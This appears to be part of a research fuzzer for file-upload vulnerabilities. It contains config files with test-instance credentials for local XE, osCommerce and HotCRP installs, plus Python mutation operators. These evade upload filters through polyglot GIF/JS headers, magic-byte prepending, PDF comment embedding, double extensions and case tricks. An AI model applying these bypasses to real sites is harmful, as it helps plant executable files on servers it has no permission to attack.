15 | WebUploadPageURL = http://127.0.0.1/xe/board/96
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = editor_sequence=%domtoken:data-editor-sequence="[0-9]{1,7}"@[0-9]{1,7}#;mid=board;act=procFileUpload;Filedata=%filebinary#
21 | WebUploadedFileUrlPattern = ./files/attach/(images|binaries)/[0-9]{1,5}/[0-9]{1,5}/([0-9]{1,5}/)?[a-z|0-9]{32}(\.[a-z|A-Z|0-9]*)*
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/oscommerce2-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/oscommerce2/catalog/admin/login.php?action=process
10 | WebLoginPageURL = http://127.0.0.1/oscommerce2/catalog/admin/
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue =  
13 | WebLoginSuccessStr = Logoff</a>
14 | WebUploadURL = http://127.0.0.1/oscommerce2/catalog/admin/categories.php?cPath=&action=insert_product
15 | WebUploadPageURL = http://127.0.0.1/oscommerce2/catalog/admin/categories.php?cPath=&action=new_product
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = products_status=1;products_date_available=;manufactures_id=;products_name[1]=;products_tax_class_id=0;products_price=;products_price_gross=0;products_description[1]=;products_quantity=;products_model=;products_image=%filebinary#;products_url[1]=;products_weight=;products_date_added=2018-10-22
21 | WebUploadedFileUrlPattern = http://127.0.0.1/oscommerce2/catalog/images/%filename#
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/hotcrp-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = taekneypot@gmail.com
 4 | PW = vu!nweb321
 5 | WebRootPath = /home/user/hotcrp/
 6 | WebHost = http://127.0.0.1:8080
 7 | WebLoginIDName = email
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1:8080/testconf/?post=v57n95favigm 
10 | WebLoginPageURL = http://127.0.0.1:8080/testconf/
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = signin=1
13 | WebLoginSuccessStr = ">Sign out<
14 | WebUploadURL = http://127.0.0.1:8080/testconf/paper.php/new/edit?post=%domtoken:post=[a-z|0-9]{12}@[a-z|0-9]{12}#
15 | #WebuploadURL = http://127.0.0.1:8080/testconf/paper.php/new
16 | WebUploadPageURL = http://127.0.0.1:8080/testconf/paper.php/new
17 | WebUploadFormAttr = 
18 | #id=paperform
19 | WebUploadCustomHeader =
20 | WebUploadCSRFName =
21 | WebUploadSuccessStr = %filename#
22 | WebUploadAdditionalValue = title=%rndint#;paperUpload=%filebinary#;auname1=asdf;auemail1=222@dfs.dfs;auaff1=123421;auname2=;auemail2=;auaff2=;auname3=;auemail3=;auaff3=;auname4=;auemail4=;auaff4=;auname5=;auemail5=;auaff5=;has_contacts=1;abstract=asdf;has_pcconf=1;submitpaper=1;doemail=1;emailNote=;update=1;override=1;pcc1=1
23 | WebUploadedFileUrlPattern = \.\.\/\.\.\/doc\.php\/hotcrp2-paper[0-9]*(\.[a-z|0-9]*)+
24 | WebUploadFilesURL =
25 | WebUploadFilesParameter =
26 | 
27 | [DETECTOR_CONF]
28 | 
29 | MutationChainLimit = 99
30 | MonitorEnable = False
31 | MonitorHost = 127.0.0.1 
32 | MonitorPort = 
33 | 


--------------------------------------------------------------------------------
/mutation_op/m03_jpg.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation3 : Change Contents-Type to JPG File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP'], 'html':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_BZ2','M04_XHT'], 'xhtml':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_BZ2'], 'js':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_JPG','M04_PNG','M04_GIF']}# ['M03_PNG', 'M03_GIF', 'M03_ZIP', 'M03_TAR_GZ', 'M03_PDF'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"jpg":"resource/test.jpg"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["jpg"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M3JPG'
21 |     output['filetype'] = utils.extract_filetype(resource_file)
22 | 


--------------------------------------------------------------------------------
/mutation_op/m03_pdf.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation3 : Change Contents-Type to JPG File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP'], 'html':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_BZ2','M04_XHT'], 'xhtml':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_BZ2'], 'js':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP','M04_GIF','M04_JPG','M04_PNG']}#['M03_JPG', 'M03_PNG', 'M03_GIF', 'M03_ZIP', 'M03_TAR_GZ'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"pdf":"resource/test.pdf"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["pdf"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M3PDF'
21 | 
22 |     output['filetype'] = utils.extract_filetype(resource_file)
23 | 


--------------------------------------------------------------------------------
/mutation_op/m03_zip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation3 : Change Contents-Type to JPG File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP'], 'html':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_BZ2', 'M04_XHT'], 'xhtml':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_BZ2'], 'js':['M03_GIF', 'M03_JPG', 'M03_PDF', 'M03_PNG', 'M03_TAR_GZ', 'M03_ZIP', 'M04_JPG', 'M04_PNG', 'M04_GIF']}#['M03_JPG', 'M03_PNG', 'M03_GIF', 'M03_TAR_GZ', 'M03_PDF'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"zip":"resource/test.zip"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["zip"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M3ZIP'
21 | 
22 |     output['filetype'] = utils.extract_filetype(resource_file)
23 | 


--------------------------------------------------------------------------------
/mutation_op/m11.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation11: Case Mutator"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07','M10', 'M11'], 'html':['M07', 'M10', 'M11','M04_BZ2','M04_XHT','M12_HTML','M12_XHTML'], 'xhtml':['M07', 'M10', 'M08', 'M11', 'M04_BZ2'], 'js':['M10', 'M11','M04_GIF','M04_PNG', 'M04_JPG']}#['M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M11'
19 |       tmp = ""
20 |       for i in range(0,len(output['fileext'])):
21 |         if i == '.':
22 |           pass
23 |         elif i % 2 == 0:
24 |           tmp += output['fileext'][i].upper()
25 |         else:
26 |           tmp += output['fileext'][i]
27 | 
28 |       output['fileext'] = tmp
29 | 


--------------------------------------------------------------------------------
/mutation_op/m12_xhtml.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX']}# ['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12XHTML'
19 | 
20 |       output['fileext'] = 'xhtml.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m04_gif.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_GIF','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10']}#['M04_JPG', 'M04_PNG', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4GIF'
19 |       if '.' not in output['fileext']:
20 |         output['fileext'] = 'gif'
21 |       else:
22 |         output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.gif'
23 | 


--------------------------------------------------------------------------------
/mutation_op/m04_png.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_PNG','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4PNG'
19 |       if '.' not in output['fileext']:
20 |         output['fileext'] = 'png'
21 |       else:
22 |         output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.png'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_jpg.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_JPG','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10']}# ['M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4JPG'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'jpg'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.jpg'
23 | 
24 | 
25 | 


--------------------------------------------------------------------------------
/mutation_op/m02_jsgif.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import struct
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'js':['M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_JPG','M04_PNG','M04_GIF']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_JPG', 'M02_PNG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M06', 'M08','M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     gifstructure = [b'\x47\x49\x46\x38\x39\x61', b'\x2F\x2A', b'\x0A\x00', b'\x00', b'\xFF', b'\x00', b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B', b'\x2A\x2F', b'\x3D\x31\x3B']
14 | 
15 |     output['content'] = b''.join(gifstructure)+output['content']+b'\x3B'
16 |     """
17 |     with open('new.gif','wb') as fp:
18 |       fp.write(output['content'])
19 |     """
20 |     if output['filename'] != None and len(output['filename']) > 0:
21 |       filename = output['filename']
22 |     else:
23 |       filename = utils.extract_filename(seed_file)
24 |     output['filename'] = filename + '_M2JSGIF'
25 | 
26 | #============================================================================================================#
27 | #======= Script Referenced from : https://pastebin.com/6yUbfGX5 =============================================#
28 | #============================================================================================================#
29 | 
30 | 


--------------------------------------------------------------------------------
/mutation_op/m02_pdf.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | 
 3 | class mOP(MutationOP):
 4 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 5 |   __mutate_type__ = "file"  # (file|request) ; type of target
 6 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M10', 'M07_OTHER'] # ([classname])when this op used for mutation,
 7 |                         # operations in this list can be used to extra mutation.
 8 |   __resource__ = {"jpg":""} # ({type:resource filename})
 9 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
10 | 
11 |   def operation(self, output, seed_file, resource_file=None):
12 |     commentBlock = [b'\x25\xb5\x61',output['content'],b'\x0d\x0a']
13 |     with open('./resource/test.pdf','rb') as fp:
14 |       data = fp.read()
15 | 
16 |     output['content'] = data[:10]+b''.join(commentBlock)+data[10:]
17 |     """
18 |     with open('new.pdf','wb') as fp:
19 |       fp.write(output['content'])
20 |     """
21 |     if output['filename'] != None and len(output['filename']) > 0:
22 |       filename = output['filename']
23 |     else:
24 |       filename = utils.extract_filename(seed_file)
25 |     output['filename'] = filename + '_M2PDF'
26 | 


--------------------------------------------------------------------------------
/mutation_op/m01_jpg.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"jpg":"resource/test.jpg"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 |   def operation(self, output, seed_file, resource_file=None):
12 |     if resource_file == None:
13 |       resource_file = self.__resource__["jpg"]
14 | 
15 |     if output['filename'] != None and len(output['filename']) > 0:
16 |       filename = output['filename']
17 |     else:
18 |       filename = utils.extract_filename(seed_file)
19 |     output['filename'] = filename + '_M1JPG'
20 |     output['content'] = utils.extract_content(resource_file)[:1024] + \
21 |             output['content']
22 |       #test
23 |       #f = open('file.bin', 'wb')
24 |       #f.write(output['content'])
25 |       #f.close()
26 | 


--------------------------------------------------------------------------------
/mutation_op/m01_gif.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation1 : set 1024byte from gif resource file in front of seed"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}
 8 | #['M01_JPG', 'M01_PNG', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08','M10'] # ([classname])when this op used for mutation,
 9 |                         # operations in this list can be used to extra mutation.
10 |   __resource__ = {"gif":"resource/test.gif"} # ({type:resource filename})
11 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["gif"]
15 |     if output['filename'] != None and len(output['filename']) > 0:
16 |       filename = output['filename']
17 |     else:
18 |       filename = utils.extract_filename(seed_file)
19 |     output['filename'] = filename + '_M1GIF'
20 |     output['content'] = utils.extract_content(resource_file)[:1024] + \
21 |             output['content']
22 | 
23 |       #test
24 |       #f = open('file.bin', 'wb')
25 |       #f.write(output['content'])
26 |       #f.close()
27 | 


--------------------------------------------------------------------------------
/mutation_op/m01_zip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}# ['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08',  'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"zip":"resource/test.zip"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["zip"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M1ZIP'
21 |     output['content'] = utils.extract_content(resource_file)[:1024] + \
22 |               output['content']
23 |       #test
24 |       #f = open('file.bin', 'wb')
25 |       #f.write(output['content'])
26 |       #f.close()
27 | 


--------------------------------------------------------------------------------
